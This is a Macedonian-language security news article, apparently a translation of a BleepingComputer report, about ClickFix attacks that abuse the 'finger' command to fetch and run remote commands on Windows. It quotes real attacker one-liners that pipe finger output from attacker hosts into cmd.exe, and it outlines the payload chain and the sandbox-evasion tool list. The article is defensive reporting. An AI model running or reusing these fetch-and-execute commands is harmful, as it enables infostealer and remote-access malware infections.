Пријави инцидент
Пријави инцидент
Преглед на приватноста

Оваа веб-страница користи колачиња за да ви обезбеди најдобро можно корисничко искуство. Информациите за колачињата се складираат во вашиот прелистувач и извршуваат функции како препознавање кога се враќате на нашата веб-страница и им помагаат на нашите програмери да разберат кои делови од веб-страницата ви се најинтересни и најкорисни.

Строго неопходни колачиња

Строго неопходните колачиња треба да бидат овозможени во секое време за да можеме да ги зачуваме вашите поставки за колачиња.

Powered by  GDPR Cookie Compliance

Децении стар „Finger“ протокол злоупотребен во ClickFix malware напади

Објавено: 17.11.2025

Децении стариот команден алат „finger“ повторно се враќа во употреба, при што заканувачки актери го користат протоколот за да преземат далечински команди кои се извршуваат на Windows уреди.

Во минатото, командата finger се користела за да се побараат информации за локални и оддалечени корисници на Unix и Linux системи преку Finger протоколот, а подоцна командата била додадена и во Windows. Иако сè уште е поддржана, денес многу ретко се користи во споредба со нејзината популарност пред децении.

Кога ќе се изврши, командата finger враќа основни информации за корисник, вклучувајќи го неговото корисничко име, име (ако е поставено во /etc/passwd), домашен директориум, телефонски броеви, последна активност и други детали.

Излез од командата Finger

Во последно време имаше злонамерни кампањи кои го користат Finger протоколот во напади кои изгледаат како ClickFix напади што преземаат команди за извршување на уреди.

Ова не е првпат командата finger да биде злоупотребена на овој начин, бидејќи истражувачите предупредија во 2020 година дека била користена како LOLBIN за преземање малвер и избегнување откривање.

Злоупотреба на командата finger

Минатиот месец, истражувачот за сајбер безбедност MalwareHunterTeam сподели batch датотека [VirusTotal] со BleepingComputer која, кога беше извршена, ја користеше командата „finger root@finger.nateams[.]com“ за да преземе команди од оддалечен finger сервер, кои потоа беа извршени локално преку пренасочување низ cmd.exe.

Batch датотека што ја извршува командата finger за да преземе скрипта

Додека тој хост повеќе не е достапен, MalwareHunterTeam пронајде дополнителни примероци на малвер и напади кои ја користат командата finger.

На пример, една личност на Reddit неодамна предупреди дека станала жртва на ClickFix напад кој се претставувал како Captcha, барајќи од нив да извршат Windows команда за да потврдат дека се човек.

„Токму што паднав на verify you are human win + r. Што да правам?“, стои во Reddit објавата.

„Бев во брзање и паднав на ова и завршив со внесување на следново во мојот cmd prompt:“

„cmd /c start “” /min cmd /c “finger vke@finger.cloudmega[.]org | cmd” && echo’ Verify you are human–press ENTER’“

Иако хостот веќе не одговара на finger барања, друг Reddit корисник го сними излезот.

Овој напад го злоупотребува Finger протоколот како метод за далечинска испорака на скрипти, со извршување на finger vke@finger.cloudmega[.]org и пренасочување на неговиот излез низ Windows command processor, cmd.exe.

Ова предизвикува преземените команди да се извршат, што креира патека со случајно име, копира curl.exe во случајно име, го користи преименуваниот curl извршен фајл за да преземе zip архива маскирана како PDF од cloudmega[.]org, и екстрахира Python malware пакет.

Содржина на архивата маскирана како PDF

Python програмата потоа ќе биде извршена со користење на pythonw.exe init.py.

Последната извршена команда е повик назад до серверот на напаѓачот за да се потврди извршувањето, додека на корисникот му се прикажува лажен „Verify you are human“ прозорец.

Не е јасно која е целта на Python пакетот, но поврзана batch датотека укажува дека станувало збор за infostealer.

MalwareHunterTeam исто така пронајде слична кампања која користи „finger Kove2@api.metrics-strange.com | cmd“ за да преземе и изврши команди речиси идентични со претходно спомнатиот ClickFix напад.

Излез од командата finger

BleepingComputer откри дека ова е поразвиен напад, при што командите бараат алатки што вообичаено се користат во истражување на малвер и прекинуваат доколку ги пронајдат. Овие алатки ги вклучуваат filemon, regmon, procexp, procexp64, tcpview, tcpview64, Procmon, Procmon64, vmmap, vmmap64, portmon, processlasso, Wireshark, Fiddler, Everywhere, Fiddler, ida, ida64, ImmunityDebugger, WinDump, x64dbg, x32dbg, OllyDbg и ProcessHacker.

Ако не се пронајдат алатки за анализа на малвер, командите ќе преземат zip архива маскирана како PDF фајлови и ќе ја екстрахираат. Сепак, наместо да екстрахира малициозен Python пакет од лажниот PDF, таа ја екстрахира NetSupport Manager RAT пакетата.

NetSupport Manager RAT

Командите потоа ќе конфигурираат закажана задача за да го стартува малверот за далечински пристап кога корисникот ќе се најави.

Иако тековната злоупотреба на „finger“ изгледа дека ја спроведува единствен заканувач кој врши ClickFix напади, бидејќи луѓето и понатаму паѓаат на нив, важно е да се биде свесен за кампањите.

За бранителите, најдобриот начин да се блокира користењето на командата finger е да се блокира излезниот сообраќај кон TCP порт 79, кој се користи за поврзување со даемон преку Finger протоколот.

Извори:

  • Bleeping Computer – Decades-old ‘Finger’ protocol abused in ClickFix malware attacks Bleeping Computer